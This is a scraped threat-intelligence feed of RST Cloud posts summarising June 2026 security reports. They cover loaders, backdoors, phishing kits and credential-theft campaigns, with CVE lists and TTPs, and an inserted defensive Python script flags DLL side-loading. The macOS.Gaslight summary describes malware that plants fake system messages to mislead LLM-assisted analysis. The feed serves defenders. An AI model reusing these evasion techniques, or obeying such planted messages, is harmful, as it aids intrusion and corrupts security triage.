Pinned Tweet
RST Cloud
12.6K posts

RST Cloud
@rst_cloud
Threat intelligence solutions for businesses of all sizes
Sydney, New South Wales · Joined January 2015
89 Following · 673 Followers

#tireport #ExtractedDiagrams
The key diagram for the report (ML Classifier):
windows: 1, code: 2, schema: 1, dump: 2

#threatreport #HighCompleteness
StrikeShark: investigating a new campaign delivering Cobalt Strike through SharkLoader | 24-06-2026
Source: securelist.com/strikeshark-ca…
Key details below ↓
🧑💻Actors/Campaigns:
Strikeshark (🧠motivation: cyber_espionage)
💀Threats:
Cobalt_strike_tool, Sharkloader, Proxylogon_exploit, Dll_sideloading_technique, Dll_hijacking_technique, Fscan_tool, Searchall_tool, Pillager_tool, Sharpgpoabuse_tool, Credential_dumping_technique,
🎯Victims: Diplomatic organizations, Government organizations, Software development companies
🏭Industry: Government, Software_development
🌐Geo: Nepal, Syria, Colombian, Taiwan, Macedonia, Indonesia, Lebanon, Hong kong, Serbia, Colombia, North macedonia, Indonesian, Chinese
🔓CVEs: CVE-2016-4437 \[[Vulners](vulners.com/cve/CVE-2016-4…)]
- CVSS V3.1: *9.8*,
- Vulners: Exploitation: True
Soft:
- apache aurora (<0.18.1)
- apache shiro (<1.2.5)
CVE-2022-40684 \[[Vulners](vulners.com/cve/CVE-2022-4…)]
- CVSS V3.1: *9.8*,
- Vulners: Exploitation: True
Soft:
- fortinet fortiproxy (<7.0.7, 7.2.0)
- fortinet fortiswitchmanager (7.0.0, 7.2.0)
- fortinet fortios (<7.0.7, <7.2.2)
CVE-2021-36260 \[[Vulners](vulners.com/cve/CVE-2021-3…)]
- CVSS V3.1: *9.8*,
- Vulners: Exploitation: True
Soft:
- hikvision ds-2cd2026g2-iu\/sl_firmware (-)
CVE-2022-27925 \[[Vulners](vulners.com/cve/CVE-2022-2…)]
- CVSS V3.1: *7.2*,
- Vulners: Exploitation: True
Soft:
- synacor zimbra_collaboration_suite (8.8.15, 9.0.0)
CVE-2024-21762 \[[Vulners](vulners.com/cve/CVE-2024-2…)]
- CVSS V3.1: *9.8*,
- Vulners: Exploitation: True
Soft:
- fortinet fortiproxy (<2.0.14, <7.0.15, <7.2.9, <7.4.3)
- fortinet fortios (<6.0.18, <6.2.16, <6.4.15, <7.0.14, <7.2.7)
CVE-2023-32315 \[[Vulners](vulners.com/cve/CVE-2023-3…)]
- CVSS V3.1: *8.6*,
- Vulners: Exploitation: True
Soft:
- igniterealtime openfire (<4.6.8, <4.7.5)
CVE-2025-55182 \[[Vulners](vulners.com/cve/CVE-2025-5…)]
- CVSS V3.1: *10.0*,
- Vulners: Exploitation: True
Soft:
- facebook react (19.0.0, 19.1.0, 19.1.1, 19.2.0)
CVE-2023-46747 \[[Vulners](vulners.com/cve/CVE-2023-4…)]
- CVSS V3.1: *9.8*,
- Vulners: Exploitation: True
Soft:
- f5 big-ip_access_policy_manager (le13.1.5, le14.1.5, le15.1.10, le16.1.4, le17.1.1)
CVE-2023-20198 \[[Vulners](vulners.com/cve/CVE-2023-2…)]
- CVSS V3.1: *10.0*,
- Vulners: Exploitation: True
Soft:
- rockwellautomation allen-bradley_stratix_5200_firmware (<17.12.02)
CVE-2024-36401 \[[Vulners](vulners.com/cve/CVE-2024-3…)]
- CVSS V3.1: *9.8*,
- Vulners: Exploitation: True
Soft:
- geoserver (<2.22.6, <2.23.6, <2.24.4, <2.25.2)
- geotools (<29.6, <30.4, <31.2, 30.0, 31.0)
CVE-2022-41082 \[[Vulners](vulners.com/cve/CVE-2022-4…)]
- CVSS V3.1: *8.0*,
- Vulners: Exploitation: True
Soft:
- microsoft exchange_server (2013, 2016, 2019)
CVE-2021-26855 \[[Vulners](vulners.com/cve/CVE-2021-2…)]
- CVSS V3.1: *9.8*,
- Vulners: Exploitation: True
Soft:
- microsoft exchange_server (2013, 2016, 2019)
CVE-2021-27076 \[[Vulners](vulners.com/cve/CVE-2021-2…)]
- CVSS V3.1: *8.8*,
- Vulners: Exploitation: Unknown
Soft:
- microsoft business_productivity_servers (2010)
- microsoft sharepoint_foundation (2013)
- microsoft sharepoint_server (2016, 2019)
📚TTPs:
⚔️Tactics: 2
🛠️Technics: 0
🤖LLM extracted TTPs:
T1003.001, T1003.003, T1018, T1027.002, T1027.009, T1033, T1036.004, T1036.005, T1036.007, T1049, ...
🧨IOCs:
- File: 10
- Path: 3
- Command: 4
- Hash: 9
- Domain: 4
💽Software: Microsoft Exchange, Microsoft SharePoint, Openfire, GeoServer, Apache Shiro, Zimbra Collaboration Suite, Microsoft Exchange Server, BIG-IP, Fortinet FortiOS, AnyConnect, ...
🔢Algorithms: aes, aes-128, blowfish, ror13, md5
🔠Functions: SetUserProcessPriorityBoost, Beacon
🗂️Win API: ShellExecuteW, CreateThread, LoadLibrary, LeaveCriticalSection, InterlockedDecrement64, SetEvent, VirtualAlloc, CreateProcessA, CreateProcessW, CreateWaitableTimerW, ...
📜Programming Languages: powershell
#threatreport:
The StrikeShark campaign has been identified as a sophisticated threat involving a new malware loader named SharkLoader, aimed at deploying Cobalt Strike Beacon on compromised systems. This campaign appears to leverage multiple infection vectors, primarily through the exploitation of vulnerabilities in internet-facing applications such as Microsoft Exchange, Openfire Server, and GeoServer. Notable vulnerabilities identified include CVE-2021-26855 (ProxyLogon) and CVE-2023-32315, which were exploited in attacks across various nations, indicating a broad target range that spans governmental and software development sectors globally.
The attackers utilize both exploitation methods and custom droppers, with the latter often impersonating legitimate software installations. For instance, a Cisco AnyConnect installer was used as a lure, which extracted and executed malicious components while appearing legitimate to users. The SharkLoader dropper executes these components discreetly, stores them in common directories such as %APPDATA%, and employs techniques to maintain persistence, including scheduled tasks and registry modifications.
Once loaded, SharkLoader employs a Perfect DLL Hijacking technique to execute its malicious code without causing deadlocks due to the Windows loader lock, revealing a high level of technical sophistication. The malware also implements robust evasion techniques, such as API hooking and the use of Vectored Exception Handlers to deceitfully manage memory protections during its operations.
The infection chain establishes a layered architecture where SharkLoader unpacks further malicious payloads like DscCoreR.mui and SyncRes.dat, leading to the eventual execution of Cobalt Strike Beacon shellcode. This advanced implementation allows the malware to create threads for executing its payload while actively monitoring system behavior for potential detection.
Victimology suggests a dual strategy, targeting both government and commercial software development entities, hinting at potential espionage motives alongside a capacity for opportunistic exploitation of vulnerabilities across sectors. Despite distinct indicators pointing toward Chinese-speaking developers behind the tools utilized in this campaign, attribution remains preliminary as no definitive connections to known cyber threat actors have been established.
In summary, the ongoing investigation surrounding the StrikeShark campaign illustrates a complex malware delivery system capable of wide-reaching attacks across various sectors, warranting careful scrutiny and preparation against such evolving technical threats.

#threatreport #HighCompleteness
Analyzing TAX#TRIDENT: Fake Indian Tax Lures Pivot Across ZIP, VBS, Stego and PHP-Wrapped VBS Delivery | 23-06-2026
Source: securonix.com/blog/taxtriden…
Key details below ↓
🧑💻Actors/Campaigns:
Tax_trident (🧠motivation: cyber_espionage, financially_motivated)
💀Threats:
Steganography_technique, Sysaid_tool, Syncfuture_tool, Ytscrat, Lolbin_technique, Bitsadmin_tool, Spear-phishing_technique,
🎯Victims: Windows endpoints, India
🏭Industry: Financial
🌐Geo: China, Indian, Chinese, India
📚TTPs:
⚔️Tactics: 7
🛠️Technics: 23
🧨IOCs:
- Domain: 4
- File: 6
- IP: 8
- Path: 4
- Url: 6
- Hash: 16
💽Software: Windows installer, Windows service, curl
🔢Algorithms: zip, sha256
⚙️Win Services: BITS
📜Programming Languages: vbscript, powershell, php, visual_basic
💻Platforms: x86
#threatreport:
The TAX#TRIDENT campaign represents an ongoing cyber threat leveraging fake Indian Income Tax-themed lures to deliver malicious payloads to Windows endpoints. This operation employs three distinct delivery paths: direct ZIP file downloads, VBScript downloaders, and PHP-looking web endpoints that return malicious script content. Regardless of the delivery mechanism, each route culminates in the installation of a signed ClientSetup payload. Upon execution, this payload establishes a hidden client directory, maintains persistence through services and drivers, writes configuration settings, and initiates outbound network communications.
The evolution of the TAX#TRIDENT campaign is marked not by the emergence of new malware but by the repurposing and expansion of previously documented tax-themed tactics. The campaign intertwines established behaviors seen in adverse software associated with Chinese tooling, particularly evident in file metadata and configuration naming conventions that align with known Chinese software abuse. However, while these insights reveal the type of software exploited, they do not provide definitive attribution to specific threat actors.
The first delivery chain begins at a fake Indian tax assessment page leading to a ZIP file that executes a signed Windows installer. This method relies on social engineering, prompting victims to believe they are opening legitimate tax-related documents. The second chain deploys the same ClientSetup payload via a VBScript that showcases a decoy image, further obscuring the attack's true intent. The third approach adopts a unique PHP endpoint named "download.php," which serves VBScript content masked as a web application, facilitating downloads from cloud-hosted resources and subtly altering UAC behavior to facilitate the silent installation of the ManageEngine UEMS agent.
Key behavioral indicators signal potential malicious activity, such as VBScript execution from unexpected web application extensions like ".php", and the presence of disguised executable tools within public directories. Additionally, unusual UAC policy modifications, silent MSI installations, and unsolicited outbound traffic to unapproved infrastructures should be heavily scrutinized.

#threatreport #LowCompleteness
Payouts King Ransomware Initial Access Broker Deploys New Edgecution Malware | 23-06-2026
Source: zscaler.com/blogs/security…
Key details below ↓
🧑💻Actors/Campaigns:
Payouts_king
💀Threats:
Edgecution,
🎯Victims: Organizations
📚TTPs:
⚔️Tactics: 1
🛠️Technics: 0
🤖LLM extracted TTPs:
T1027, T1036, T1053.005, T1059.001, T1059.003, T1059.006, T1071.001, T1082, T1112, T1140, ...
🧨IOCs:
- Path: 1
- Registry: 2
- File: 2
- Url: 4
- Hash: 2
💽Software: Microsoft Edge, Chrome, Microsoft Teams, Outlook, AutoHotKey, Microsoft Outlook, Windows registry
🔢Algorithms: sha256, zip
📜Programming Languages: python, powershell
#threatreport:
The Payouts King ransomware has harnessed a sophisticated technique involving a malicious Microsoft Edge browser extension dubbed Edgecution, which is used by an initial access broker. This extension exploits the Chrome native messaging protocol, allowing attackers to bypass typical browser sandbox limitations and gain extensive control over host systems. This capability enables the manipulation of the local filesystem, execution of arbitrary code, and launching of processes directly from the compromised host.
The Edgecution malware employs two primary components: the malicious Edge browser extension and a Python-based backdoor. The attack vector typically begins with social engineering tactics, where the threat actor impersonates IT staff through platforms like Microsoft Teams, convincing victims to download a fake patch disguised within an encrypted ZIP file. This ZIP file contains files necessary to deploy the Edgecution malware, including a Python distribution, an extension, and an obfuscated Python script that carries out the malicious functions.
Upon installation, commands from the AutoHotKey script or other scripts configure the environment, fix ZIP file headers, and create a scheduled task that executes Microsoft Edge loaded with the malicious extension. The extension masquerades as an "Edge Monitoring Agent" and establishes communication with a command-and-control (C2) server hosted on AWS. The Python backdoor acts as a bridge, executed in a headless mode, allowing the attackers to avoid drawing user attention while maintaining operational control over the compromised environment.
Edgecution's functionality includes a variety of commands for malicious activities, many of which require permissions usually restricted to regular browser extensions. By using the native messaging protocol, the Edgecution extension can invoke the backdoor to perform tasks that include filesystem access and code execution. Communication between the extension and the Python backdoor is structured in JSON format, with messages indicating command types and execution results.
This collaboration between the malicious extension and its Python backdoor illustrates a sophisticated method of maintaining a foothold in victim environments, marking a notable evolution in tactics employed by ransomware affiliates. The methods employed by the Payouts King attackers highlight the need for organizations to enhance their defenses against such threats, emphasizing the importance of monitoring browser extension installations, controlling native messaging configurations, and conducting user education to detect suspicious communications that mimic legitimate updates.

#threatreport #MediumCompleteness
CVE-2025-54068 Laravel Livewire Credential Theft Campaign: 6,000+ Applications Compromised | 23-06-2026
Source: imperva.com/blog/cve-2025-…
Key details below ↓
🎯Victims: E commerce, Healthcare, Financial services, Education, Government, Online gambling and betting, Logistics
🏭Industry: Government, Healthcare, E-commerce, Education, Logistic
🌐Geo: Asia, Indonesian, Asian, Brazilian
🔓CVEs: CVE-2025-54068 \[[Vulners](vulners.com/cve/CVE-2025-5…)]
- CVSS V3.1: *9.8*,
- Vulners: Exploitation: True
Soft:
- laravel livewire (<3.6.4)
📚TTPs:
⚔️Tactics: 4
🛠️Technics: 11
🧨IOCs:
- Url: 1
- File: 2
- Hash: 1
- IP: 1
- Domain: 1
- Email: 1
💽Software: Laravel Livewire, Livewire, Laravel, telegram, Unix, curl
🔢Algorithms: zip, sha256
📜Programming Languages: php
#threatreport:
On May 24, 2026, a major credential theft campaign exploiting CVE-2025-54068 was observed targeting Laravel Livewire applications, primarily affecting versions up to v3.6.3. This critical vulnerability arises from inadequate validation of component property updates during the hydration process, which allows unauthenticated attackers to inject malicious serialized PHP objects leading to arbitrary code execution upon deserialization. The attacker leveraged this flaw to execute a payload that fetched and executed a Bash script from their command-and-control (C2) server.
The captured payload indicated that the attacker used PHPGGC gadget chains, which exploit existing legitimate PHP classes within Laravel applications. The malicious Bash shell script, identified as shoc.enz, was a lightweight 5,269 bytes in size, and served as a credential stealer. Once executed, it set up a temporary working directory, ensured no other instances were running, searched for sensitive .env files containing crucial configuration data, archived these files, and subsequently exfiltrated them to multiple C2 channels, while also cleaning up to erase forensic traces.
Analysis revealed that over 6,167 applications across diverse sectors, including e-commerce, healthcare, financial services, and even governmental bodies, had their credentials compromised. The extant data included more than 1,850 database dumps and extensive email lists, indicating the active exploitation of stolen credentials. Indicators attributing the campaign to an Indonesian threat actor included linguistic elements in the malware’s code and metadata associated with the C2 infrastructure, including Telegram handles and an email address linked to multiple prior breaches in underground forums.
The targeted applications encompassed a wide array of Laravel deployments, including platforms related to online gambling, education, and logistics, thereby underscoring the indiscriminate nature of the scanning efforts. Any organization utilizing unpatched Laravel Livewire v3 versions was potential prey for this extensive campaign. Overall, the operation highlights significant vulnerabilities within widely used frameworks and the severe implications of their exploitation in the cyber realm.

#tireport #ExtractedDiagrams
The key diagram for the report (ML Classifier):
schema: 2, filemanager: 1

#threatreport #LowCompleteness
A Hidden Threat: Why DarkLoadLibrary Is Dangerous and How to Detect Its Use in Attacks | 24-06-2026
Source: bi.zone/expertise/blog…
Key details below ↓
💀Threats:
Darkloadlibrary_tool, Nighthawk_tool,
🤖LLM extracted TTPs:
T1003.001, T1106, T1179, T1620
🧨IOCs:
- File: 5
- Coin: 2
🔠Functions: LdrpFindLoadedDllByName, GetModuleHandle
🗂️Win API: ZONE, LdrLoadDll, NtCreateSection, NtMapViewOfSection, GetProcAddress, tMapViewOfSection, NtAllocateVirtualMemory, tMapViewOfSection it, tAllocateVirtualMemory, NtOpenSection, ...
#threatreport:
DarkLoadLibrary is a sophisticated tool that demonstrates how attackers manipulate low-level Windows mechanisms to bypass security systems, particularly by stealthily loading malicious code. This Dynamic Link Library (DLL) loader circumvents the standard execution notifications provided by the LoadImageNotifyRoutine, allowing attackers to execute code without triggering alerts from security tools.
The operation of DarkLoadLibrary begins with the invocation of the NtCreateSection function, where a file is read at the kernel level, creating a section that holds the necessary data. Normally, this process includes mapping the section into memory via the NtMapViewOfSection function, which typically requires LoadImageNotifyRoutine's involvement. However, DarkLoadLibrary diverges from this by using the NtAllocateVirtualMemory function to allocate memory for the DLL, effectively preventing security tools from recording telemetry associated with the loading of the module. This design choice allows malware to use native API functions while avoiding potential hooks set by monitoring security tools.
An example of practical implementation can be seen in the NightHawk command and control (C2) framework (version 0.2.1). NightHawk intercepts critical functions such as NtOpenSection, NtCreateSection, and NtMapViewOfSection during the LdrLoadDll call process. The interceptor acts by preventing known DLLs from loading by returning an error code when a targeted DLL attempt matches a predefined list for loading via DarkLoadLibrary. This prevents the DLL from being loaded from the KnownDll and processes it through the stealthier method enabled by DarkLoadLibrary.
Once a section for the requested DLL is created, NightHawk modifies its section descriptor to ensure that the memory is allocated from the virtual memory space, which is managed directly by the Windows operating system, thus allowing all normal operations to proceed unhindered after initial interception. Metrics to confirm the presence of DarkLoadLibrary can be derived from memory access events, such as when a process like LSASS.exe is dumped using the MiniDumpWriteDump function. Calls made from memory regions that lack a corresponding file indicate the use of DarkLoadLibrary.

#threatreport #LowCompleteness
EvilTokens: How “Ghost” Code Threatens US and European Businesses | 23-06-2026
Source: any.run/cybersecurity-…
Key details below ↓
💀Threats:
Eviltokens_tool, Device_code_phishing_technique,
🎯Victims: Businesses, Organizations
🌐Geo: United states
🤖LLM extracted TTPs:
T1027, T1140, T1480.001, T1528, T1550.001
🔢Algorithms: aes-gcm
🗂️Win API: RUN
📜Programming Languages: javascript
#threatreport:
EvilTokens represents a significant cyber threat due to its sophisticated mechanism for phishing attacks, primarily targeting organizations in the United States and Europe. This phishing kit exploits the Microsoft Device Code Authentication process and operates in a manner that obfuscates its malicious intent, making it difficult for security operations center (SOC) teams to detect. Rather than directly stealing user credentials, EvilTokens entices victims to unknowingly authorize access to their accounts through legitimate login flows.
The kit leverages browser-side decryption, where key elements of its phishing scheme are hidden behind AES-GCM encryption, only becoming visible after the browser decrypts and renders the content. This presents a substantial visibility gap during static URL analyses and complicates incident investigations. SOC teams can benefit from examining browser-level evidence that can lead to quicker decisions for containment. Such evidence includes tracking HTML Document Object Model (DOM) changes, monitoring HTTP requests, and analyzing URL details to understand network activity and final destinations involved in the phishing attempt.
Moreover, detailed investigation of a single EvilTokens session can uncover related phishing infrastructure, as identified patterns and signatures can link to other phishing activity. This allows SOC teams to look beyond isolated incidents and detect broader campaigns that may utilize similar tactics. By generating threat intelligence based on the behavior and code patterns observed, teams are better equipped to enhance phishing signatures, implement effective custom detection methods, and perform proactive threat hunting.
The inherent "ghost code" nature of EvilTokens makes the attack challenging but also highlights the importance of browser monitoring. By reconstructing the phishing logic through decrypted DOM content and correlating it with network traffic, security professionals can identify malicious code patterns, endpoints, and behaviors that could inform future detection efforts. This multi-faceted approach empowers SOC teams to effectively respond to EvilTokens as well as similar threats, thereby improving their overall security posture against evolving phishing tactics.

#threatreport #LowCompleteness
macOS.Gaslight | Rust Backdoor Turns Prompt Injection on the Analyst, Not the Sandbox | 23-06-2026
Source: sentinelone.com/labs/macos-gas…
Key details below ↓
💀Threats:
Bonzai, Supply_chain_technique, Amos_stealer, Hades, Shai-hulud,
🎯Victims: Macos users
🌐Geo: North korean, Dprk
📚TTPs:
⚔️Tactics: 1
🛠️Technics: 0
🤖LLM extracted TTPs:
T1005, T1016, T1036.005, T1041, T1057, T1059.004, T1059.006, T1071.001, T1082, T1102.002, ...
🧨IOCs:
- Hash: 4
💽Software: macOS, Telegram, Linux, Chrome, Firefox, PyInstaller, Nuitka, Anthropic, Claude
🔢Algorithms: base64, aes-gcm, zip, aes
🔠Functions: getUpdates
📜Programming Languages: python, rust, cpython
💻Platforms: arm, cross-platform, apple
#threatreport:
The macOS.Gaslight implant, attributed to North Korean-aligned activity, is a sophisticated Rust-based backdoor that utilizes a unique approach to mislead analysts during malware analysis rather than attempting to evade sandbox detection. It embeds a payload consisting of 38 fabricated system messages aimed at casting doubt on the results of LLM-assisted triage processes. This command-and-control (C2) mechanism employs the Telegram Bot API for communication, utilizing a polling method that activates when no webhook is registered, and adheres to strict transport security using AES-GCM encryption over certificate-pinned TLS connections. The implant autonomously redacts its Telegram bot token from its runtime output, thwarting potential data recovery by security analysts.
Distribution of macOS.Gaslight was initially detected following an Apple XProtect update in June 2023, though it remained undetected by static analysis at the time of that update. It is designed to prevent system sleep through a power-management assertion, ensuring continual polling and data collection even during periods of inactivity. The implant contains components for data theft, particularly targeting sensitive information such as browser histories and credentials stored in the macOS keychain, facilitated by an encoded Python script that assembles a complete data collection environment using a standalone CPython runtime fetched upon execution.
Persistence mechanisms are integrated through a LaunchAgent configured to masquerade as system services, maintaining stealth within the macOS ecosystem. This technique is commonly observed among malware families associated with DPRK. Furthermore, the implementation of self-redaction of the bot token represents a proactive operational security (OPSEC) measure, significantly enhancing the resilience of the implant against analysis.
The malware's design highlights an innovative tactic of prompt injection, which serves to compromise the effectiveness of AI-driven analysis by introducing complexity into the evaluation process. This characteristic distinguishes macOS.Gaslight from prior examples of malware that either leveraged AI for operational tasks or employed simpler forms of obfuscation. With its combination of robust collection capabilities, stringent C2 security, and analyst-targeting strategies, macOS.Gaslight exemplifies an emerging threat landscape where adversaries increasingly seek to exploit AI tools that are fundamental to cybersecurity efforts.

#threatreport #HighCompleteness
Inside FortiBleed: Reverse Engineering the CyberStrike Harvester Behind a Global FortiGate Credential Factory | 24-06-2026
Source: arcticwolf.com/resources/blog…
Key details below ↓
🧑💻Actors/Campaigns:
Harvester (🧠motivation: financially_motivated, information_theft)
💀Threats:
Fortibleed_vuln, Cyberstrikeai_tool, Password_spray_technique, Credential_harvesting_technique, Supply_chain_technique, Impacket_tool, Hashcat_tool, Hashtopolis_tool, Kerberoasting_technique, As-rep_roasting_technique,
🎯Victims: Fortinet firewall and ssl vpn operators, Defense sector
🏭Industry: Healthcare, Energy, Chemical, Telco, Retail, Government, Iot, E-commerce, Financial, Entertainment, Transport, Education, Logistic
🌐Geo: Russian, Asia-pacific, Middle east, America, Turkey
📚TTPs:
⚔️Tactics: 7
🛠️Technics: 15
🧨IOCs:
- File: 3
- IP: 2
- Hash: 6
💽Software: FortiGate, Telegram, Linux, Active Directory, MSSQL, MySQL, curl
🔢Algorithms: md5, pbkdf2, rc4, sha256
📜Programming Languages: python, javascript, golang
💻Platforms: amd64
YARA: Found
#threatreport:
FortiBleed is identified as a significant credential compromise campaign that specifically targets internet-accessible Fortinet FortiGate firewalls and SSL VPN gateways. The campaign leverages a sophisticated credential acquisition pipeline that includes methods such as credential stuffing, password spraying, configuration harvesting, offline cracking, and post-authentication data processing, rather than relying on traditional malware delivery mechanisms.
The investigation into this campaign led to the reverse engineering of the CyberStrike Harvester binary, connecting it to the broader operational framework utilized by the FortiBleed operators. This includes the extraction of multi-protocol credentials, hash cracking, and unauthorized access to Active Directory and SMB services, ultimately facilitating data exfiltration from compromised systems. The campaign is assessed as having a severe risk level, although there is no confirmed evidence of exploitation of a Fortinet CVE as the primary means of initial access. It is believed that the operation serves as a credential brokerage, possibly a hybrid scam focusing on high-value credential harvesting.
The tools used in this operation align with public descriptions of the adversaries' environment, which is characterized by a variety of tools and scripts designed for effective exploitation and credential management. The recovered assets include a sophisticated CyberStrike lab setup with a sniffer panel for traffic capture, scripts for processing PCAP files, and various utilities for cracking cryptographic hashes using platforms like Hashcat and Hashtopolis. The CyberStrike Harvester, a key component, is responsible for converting captured network data into actionable credentials and hash outputs, effectively turning traffic and configuration data into usable accesses.
The campaign operates through a systematic credential-centric attack vector, utilizing methods for mass credential validation and harvesting configuration files from targeted devices. After gaining access, captured data is processed offline, resulting in the collection of a wide range of authentication artifacts, including session tokens and cookies, which are then cleaned and validated for further attacks. The actor employs a multi-stage cleaning process aimed at refining the credential data before deploying Hashcat for offline cracking efforts, indicating a methodical approach to credential extraction and validation.
A notable aspect of the FortiBleed attack infrastructure is that it comprises both attacker-controlled systems and victim-assigned components, with a collaboration setup of virtual machines running Kali Linux and CyberStrike. The operators implement advanced techniques for validating and prioritizing access through protocols like Kerberos and SMB, leading to systematic internal data collection and exfiltration.
The operational discipline surrounding the FortiBleed campaign underscores a repeatable and effective system for exploiting exposed exterior credentials, moving through various stages from capture to verification to data procurement. It highlights the critical need for organizations to not only patch vulnerabilities but also to implement comprehensive remediation strategies, including credential resets, validating session authenticity, and enhancing multi-factor authentication measures to mitigate potential threats from similar credential-centric operations.

#threatreport #MediumCompleteness
Backdoor.Mistic: New Backdoor May be Linked to Ransomware Access Broker | 24-06-2026
Source: security.com/threat-intelli…
Key details below ↓
🧑💻Actors/Campaigns:
Dragonforce
💀Threats:
Mltbackdoor, Kongtuke, Modelorat, Qilin_ransomware, Blackbasta, Interlock, Rhysida, Akira_ransomware, 8base, Clickfix_technique, Filefix_technique, Crashfix, Winpython_tool, Lolbin_technique, Nexshield, Mintsloader, Kerberoasting_technique, Anydesk_tool, Splashtop_tool,
🎯Victims: Insurance, Education, Information technology, Professional services
🏭Industry: Education
🤖LLM extracted TTPs:
T1007, T1018, T1027, T1036, T1053.005, T1059.001, T1059.005, T1059.006, T1059.007, T1069.002, ...
🧨IOCs:
- File: 12
- Hash: 9
💽Software: Node.js, Curl, WordPress, Windows File Explorer, Microsoft Teams, Chrome, GateKeeper, Active Directory
🔢Algorithms: rc4
🗂️Win API: GetModuleFileNameW, LoadLibraryW
📜Programming Languages: javascript, vbscript, python, powershell
#threatreport:
Backdoor.Mistic is a newly identified backdoor that has been active since April 2026, primarily utilized by the cybercrime group Woodgnat, also known as KongTuke. It has been linked with various ransomware operations, particularly Qilin, and is often deployed in conjunction with ModeloRAT, a Python-based remote access trojan (RAT). The modus operandi involves opportunistic targeting across various sectors, such as insurance, education, IT, and professional services, demonstrating a wide-ranging interest in high-value organizational access rather than focusing on specific industries.
The backdoor is installed through a technique known as sideloading, using a legitimate file, MpExtMs.exe, to initiate the loading of the malicious DLL named EndpointDlp.dll. This mechanism allows Mistic to evade detection by blending in with trusted software, which enhances its stealth. Once operational, the backdoor executes commands from a command and control (C2) server entirely in memory without writing files to disk, enhancing its persistence and reducing the likelihood of detection. Key capabilities of Mistic include file manipulation, command execution, and self-termination via a kill switch to maintain access covertly over time.
Woodgnat's operations are predominantly characterized by the provision of initial access rather than the final delivery of malicious payloads. The group specializes in creating durable remote access for resale to ransomware affiliates, and they utilize a variety of techniques to compromise systems. Their methods include the use of social engineering tactics to trick users into executing malicious PowerShell commands, which enable further exploitation.
Additionally, Woodgnat employs an array of tools such as WinPython for running ModeloRAT, alongside Node.js, which is leveraged to execute JavaScript and chain commands. The group has also been observed using living-off-the-land techniques, leveraging built-in Windows tools like Net.exe for reconnaissance and Curl for data exfiltration. A critical aspect of their strategy involves maintaining operational resilience through multiple C2 paths and obfuscated communications, particularly for non-domain-joined victims, indicating a highly skilled approach to evading detection.
The emergence of Backdoor.Mistic marks a notable trend in the evolution of cyber threats, emphasizing the use of custom-developed malware in ransomware attacks. This escalation implies a growing sophistication within the cybercriminal landscape, shifting away from reliance on dual-use tools. Woodgnat is poised as a significant threat actor to monitor, particularly in how it may adapt and innovate in collaboration with ransomware affiliates, further complicating the threat environment.
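The sideloading described above (a trusted host executable loading an attacker-supplied DLL) is usually easiest to catch in image-load telemetry rather than on disk. The following is an added example, not code from the RST Cloud post or the report it summarises: it scores Sysmon-style image-load records against a few side-loading heuristics. The records are constructed; field names follow Sysmon Event ID 7 (Image, ImageLoaded, Signature), while the benign install path under Program Files, the trusted-directory list and the signer strings are assumptions made for the example. Only the MpExtMs.exe / EndpointDlp.dll pair comes from the post.

```python
"""Flag DLL side-loading candidates in image-load telemetry.

Added example, not code from the RST Cloud post or the report it summarises.
Records are constructed Sysmon-style Event ID 7 (image load) entries; field
names follow Sysmon (Image, ImageLoaded, Signature).  The directory layout,
the benign install path and the signer strings are assumptions made for the
example; the host/DLL pair comes from the post.
"""
from dataclasses import dataclass
from pathlib import PureWindowsPath


@dataclass(frozen=True)
class ImageLoad:
    image: str             # loading process (Sysmon: Image)
    image_signature: str   # signer of the process image ("" if unsigned)
    loaded: str            # DLL path (Sysmon: ImageLoaded)
    loaded_signature: str  # signer of the DLL ("" if unsigned)


# Locations where a trusted host is expected to resolve its own DLLs from
# (assumed list).  Prefix match, so "C:\Program Files (x86)" is covered too.
TRUSTED_DIRS = (r"C:\Windows\System32", r"C:\Windows\SysWOW64", r"C:\Program Files")

# Host executable -> DLL name pairs reported as abused for side-loading (from the post).
KNOWN_PAIRS = {("mpextms.exe", "endpointdlp.dll")}


def _dir(path: str) -> str:
    return str(PureWindowsPath(path).parent).lower()


def _in_trusted_dir(path: str) -> bool:
    d = _dir(path)
    return any(d.startswith(t.lower()) for t in TRUSTED_DIRS)


def sideload_reasons(ev: ImageLoad) -> list[str]:
    """Return the heuristics this load trips; an empty list means nothing suspicious.

    Only signed host processes are considered: the technique works by borrowing
    a trusted binary's reputation, so an unsigned host is a different problem.
    """
    if not ev.image_signature:
        return []
    reasons = []
    host = PureWindowsPath(ev.image).name.lower()
    dll = PureWindowsPath(ev.loaded).name.lower()
    if not ev.loaded_signature:
        reasons.append("unsigned DLL loaded by a signed host")
    elif ev.loaded_signature.lower() != ev.image_signature.lower():
        reasons.append("DLL signer differs from host signer")
    if not _in_trusted_dir(ev.loaded):
        reasons.append("DLL resolved from outside trusted directories")
    if _dir(ev.loaded) == _dir(ev.image) and not _in_trusted_dir(ev.image):
        reasons.append("host and DLL co-located in a user-writable directory")
    if (host, dll) in KNOWN_PAIRS:
        reasons.append(f"known side-loading pair {host} -> {dll}")
    return reasons


def flag_sideloads(events, threshold: int = 2) -> list[tuple[str, list[str]]]:
    """(host image, reasons) for every event tripping at least `threshold` heuristics.

    A single reason (e.g. the known pair loaded from its normal install
    location) is not enough on its own; the combination is what matters.
    """
    out = []
    for ev in events:
        r = sideload_reasons(ev)
        if len(r) >= threshold:
            out.append((ev.image, r))
    return out


# Constructed telemetry (not real IOCs): the same signed host seen from its
# assumed install location and from a user-writable directory.
EVENTS = [
    ImageLoad(r"C:\Program Files\Windows Defender\MpExtMs.exe", "Microsoft Windows",
              r"C:\Program Files\Windows Defender\EndpointDlp.dll", "Microsoft Windows"),
    ImageLoad(r"C:\Program Files\Windows Defender\MpExtMs.exe", "Microsoft Windows",
              r"C:\Windows\System32\kernel32.dll", "Microsoft Windows"),
    ImageLoad(r"C:\Users\alice\AppData\Local\Temp\upd\MpExtMs.exe", "Microsoft Windows",
              r"C:\Users\alice\AppData\Local\Temp\upd\EndpointDlp.dll", ""),
]

if __name__ == "__main__":
    for image, reasons in flag_sideloads(EVENTS):
        print(image)
        for r in reasons:
            print("  -", r)
```

Run as a script it prints only the third record, with all four reasons; the first record trips just the known-pair heuristic and stays below the threshold, which is the behaviour you want when the legitimate product is installed in its normal location.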


#threatreport #HighCompleteness
Chinese actor compromises thousands of Wordpress sites | 23-06-2026
Source: ctrlaltintel.com/research/Wordp…
Key details below ↓
💀Threats:
Godzilla_webshell, Bestshell, Meterpreter_tool, Vshell, Snowlight,
🎯Victims: Wordpress sites, Joomla sites, Prestashop sites, Metinfo sites, Craft cms sites, Magento sites, Nacos sites, Internet facing sites
🌐Geo: Chinese
